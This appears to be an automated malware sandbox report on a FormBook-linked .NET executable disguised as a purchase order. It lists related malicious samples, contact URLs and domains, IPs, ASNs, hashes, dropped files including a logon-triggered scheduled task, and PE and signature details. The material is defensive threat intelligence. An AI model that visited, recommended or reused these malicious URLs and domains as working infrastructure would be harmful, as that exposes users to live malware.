	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
84.32.84.32	RFQ31072024_August order_pdf.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kucinglucu.online/ss24/?OfwX702x=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGYH4UbPbioiQ&CxoHR=Xjjl68Np7
	rScanned_009328.exe	Get hash	malicious	FormBook	Browse	www.energywired.online/7gjq/
	Final Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.lovezi.shop/htli/
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.lovezi.shop/htli/
	New Order#9.exe	Get hash	malicious	FormBook	Browse	www.lovezi.shop/htli/
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.arthemis-168bet.site/jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ
	PO#O_0140724.exe	Get hash	malicious	FormBook	Browse	www.rajveena.online/wptv/
	Ref_7021929821US20240709031221650.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.fnx-group.net/m1n9/?kFr8PR=iw0rIC5L6hostkULGys1mn9Z98rJFwBd4IZ9CWXlkC8Eo6XZ43yFv5eketBQRYNVgFwAUguZ+LMcNZUYMaaTKehcxUq8nTDdl+1/86C8L/zwryUwbA==&Fr=JNsp7
	Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.karak-networks.online/2afv/
	bum2sl4tSW66Q5O.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.packsperfeitas.shop/ps15/?jPj8q=pFQLwhtH0&t8o4=zsvC5rEuGJ4hWXPbafO2mimE5le/EQW7binyXpQ00wiK02bViikon7NxFYoYpXHBeyAU

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gtml.huksa.huhusddfnsuegcdn.com	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Get hash	malicious	FormBook	Browse	194.41.37.230
gtml.huksa.huhusddfnsuegcdn.com	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	194.41.37.232
www.2025tengxun171.lat	RFQ31072024_August order_pdf.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	43.129.208.111
kd-cq288.jhydns.com	Arrival Notice_AWB 5460943362_PDF.vbs	Get hash	malicious	FormBook, GuLoader	Browse	172.247.127.147
kd-cq288.jhydns.com	Arrival Notice_AWB 4560943391.vbe	Get hash	malicious	FormBook, GuLoader	Browse	172.247.127.148

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	RFQ31072024_August order_pdf.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.32
	PDFGOOOOO.HTA.hta	Get hash	malicious	Unknown	Browse	84.32.84.103
	http://r.doc.nationalrecalls.com/mk/cl/f/sh/1t6Af4OiGsE8LIj9rRd2hy5iEdjoJ9/XzvK5gnceK-6	Get hash	malicious	Unknown	Browse	84.32.84.163
	A.W.B.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	rScanned_009328.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	TT Application copy.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Final Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	https://www.uploadhub.io/YUnB2EBMGiwk2Sr/file	Get hash	malicious	HTMLPhisher	Browse	84.32.84.115
	Payrol list.exe	Get hash	malicious	FormBook	Browse	84.32.84.7
	2.msi	Get hash	malicious	Unknown	Browse	84.32.84.165
COGENT-174US	http://moremashup.com	Get hash	malicious	Unknown	Browse	154.59.122.79
	https://generously-supporter-capably.w3spaces.com/	Get hash	malicious	Unknown	Browse	38.91.45.7
	https://njd.pages.dev/account/js-reporting/?crumb=uz4.07kerli&message=javascript_not_enabled&ref=/account/challenge/password	Get hash	malicious	HTMLPhisher	Browse	143.244.208.184
	https://imtokern.net/	Get hash	malicious	Unknown	Browse	154.41.251.145
	http://r.doc.nationalrecalls.com/mk/cl/f/sh/1t6Af4OiGsE8LIj9rRd2hy5iEdjoJ9/XzvK5gnceK-6	Get hash	malicious	Unknown	Browse	154.41.249.139
	SecuriteInfo.com.Trojan.DownLoaderNET.986.27001.9963.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	50.7.236.50
	x86.elf	Get hash	malicious	Unknown	Browse	154.12.143.25
	JD3iefkslg.exe	Get hash	malicious	RedLine	Browse	143.244.169.95
	mirai.mips.elf	Get hash	malicious	Mirai	Browse	149.7.121.57
	mirai.x86.elf	Get hash	malicious	Mirai	Browse	66.250.91.23
TRELLIAN-AS-APTrellianPtyLimitedAU	HEU_KMS_Activator.exe	Get hash	malicious	Unknown	Browse	103.224.212.216
	Ia93PTYivQ.exe	Get hash	malicious	BlackMoon, Neshta	Browse	103.224.212.216
	DHL_497104778908.exe	Get hash	malicious	FormBook	Browse	103.224.182.210
	http://futamuragroup.com	Get hash	malicious	Unknown	Browse	103.224.182.250
	nell.doc	Get hash	malicious	FormBook	Browse	103.224.182.253
	Petromasila 16072024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	swift copy.exe	Get hash	malicious	FormBook	Browse	103.224.212.214
	MBL- B-1440 Draft Invoice.exe	Get hash	malicious	FormBook	Browse	103.224.212.210
	8tvMmyxveyzFcnJ.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	Arrival Notice_AWB 4560943391.vbe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
CNSERVERSUS	Frsteudgaves.exe	Get hash	malicious	FormBook, GuLoader	Browse	154.198.239.176
	SOLICITO COTIZACI#U00d3N URGENTE ..pdf.exe	Get hash	malicious	FormBook	Browse	156.251.142.107
	Dovada platii bancare.exe	Get hash	malicious	Coinhive, FormBook, Xmrig	Browse	198.16.50.171
	https://b79667.com:8365/?register=1&agent=4374577496	Get hash	malicious	Unknown	Browse	154.202.53.85
	http://b92755.com/	Get hash	malicious	Unknown	Browse	154.202.53.70
	stock request.exe	Get hash	malicious	FormBook	Browse	23.225.82.155
	LisectAVT_2403002B_263.exe	Get hash	malicious	Unknown	Browse	172.247.193.90
	LisectAVT_2403002B_263.exe	Get hash	malicious	Unknown	Browse	172.247.193.90
	pg1KiQRqSS.exe	Get hash	malicious	GhostRat, Metasploit	Browse	43.242.205.44
	aEzkowQO4H.exe	Get hash	malicious	Unknown	Browse	23.225.197.246

Process:	C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ31072024_August order_pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMRvUyus:lGLHxvCsIfA2KRHmOugras
MD5:	206820631F5A535AD90324CEA0C3F71B
SHA1:	A79FC4006BB113CEBB5D00EC355638740985079F
SHA-256:	AAAB7406C1292ACBC9740C2926E7F3C4B3E2D3D1CCDC31A15D5BEEF73174EF6A
SHA-512:	53A1B1975EA33ED7C577F923D07B9072222EE4098A4EB363DE0DC7234F80B10A216399132803904885F59A6DE7509C824A5259EE8E89D366C9EE2F7B3AD54AD2
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kskdkaeb.mnv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxyrwcch.iwt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq1w145s.2do.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsys44by.ytp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp

Download File

Process:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.122285943215564
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTuv
MD5:	5A2D6CF7A9FACBBD8466A13D542E1976
SHA1:	BF0CD920AD49096A27D5D49AAAA42D46310AB3F0
SHA-256:	7BB31AEC991F3A93919605D5C5A1FB72D7DB53DCFA3EACA336A79589066D2DE6
SHA-512:	088798DA760EE1480EB819CF32F27BECBA76AF5C1CB4E96139201882D20FCEC09A82AD5B00C52DA35385356EC679F23B7891A2F5B5C19C5C5B040D2069303364
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.122285943215564
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTuv
MD5:	5A2D6CF7A9FACBBD8466A13D542E1976
SHA1:	BF0CD920AD49096A27D5D49AAAA42D46310AB3F0
SHA-256:	7BB31AEC991F3A93919605D5C5A1FB72D7DB53DCFA3EACA336A79589066D2DE6
SHA-512:	088798DA760EE1480EB819CF32F27BECBA76AF5C1CB4E96139201882D20FCEC09A82AD5B00C52DA35385356EC679F23B7891A2F5B5C19C5C5B040D2069303364
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

Download File

Process:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	652808
Entropy (8bit):	7.905196478818749
Encrypted:	false
SSDEEP:	12288:YvgQpjndCDRIswmfdJ8hWUxE/350N2mDuPZgC5uvqpkqZiBXdQdkR:YvvjdCDRLH1UxE/35tmDuPl5uvRqZitT
MD5:	536F359F5908B1A9926B6337C3E520D4
SHA1:	D8B7AA1367B6508E1E4EE99C5E0BA9D15B097219
SHA-256:	45BAC0CD4B709400F6801F0B6DFAA5EBA1D6125D3A859ADE0CF2A1E53B637746
SHA-512:	DD1C82DC5779F28C33FD8D82B44A9000BE1643213C1BD0D68968697E8ED24578F713724300EE73927EFE058166DD00344F7E7057A44B2DB6CC69EFD86F8BDF14
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f..............0..`...P......~}... ........@.. ....................................@.................................,}..O........1...............6........................................................... ............... ..H............text....]... ...`.................. ..`.rsrc....1.......@...p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.905196478818749
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	RFQ31072024_August order_pdf.exe
File size:	652'808 bytes
MD5:	536f359f5908b1a9926b6337c3e520d4
SHA1:	d8b7aa1367b6508e1e4ee99c5e0ba9d15b097219
SHA256:	45bac0cd4b709400f6801f0b6dfaa5eba1d6125d3a859ade0cf2a1e53b637746
SHA512:	dd1c82dc5779f28c33fd8d82b44a9000be1643213c1bd0d68968697e8ed24578f713724300ee73927efe058166dd00344f7e7057a44b2db6cc69efd86f8bdf14
SSDEEP:	12288:YvgQpjndCDRIswmfdJ8hWUxE/350N2mDuPZgC5uvqpkqZiBXdQdkR:YvvjdCDRLH1UxE/35tmDuPl5uvRqZitT
TLSH:	F6D42303B370C913ED6BDAB161E8EA0247F3A05A5959C1DC1CD461ED5EF2F409A60E9F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..`...P......~}... ........@.. ....................................@................................

File Icon


Icon Hash:	1b3164cee4701987

Static PE Info

General

Entrypoint:	0x497d7e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A9A5F2 [Wed Jul 31 02:48:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x97d2c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x3180	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9c000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x95d84	0x96000	f07eb9c79524bd700fddf3b3706502a4	False	0.9561360677083334	data	7.962079598462259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x3180	0x4000	3ef1dd5ef078d7d6f5d351a150d62c39	False	0.69580078125	data	6.540051195252261	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0xc	0x1000	448a78c494dc42947bab39b839954aaa	False	0.009033203125	data	0.016408464515625623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x98100	0x2ae5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9611146525817321
RT_GROUP_ICON	0x9abf8	0x14	data	1.05
RT_VERSION	0x9ac1c	0x364	data	0.4205069124423963
RT_MANIFEST	0x9af90	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
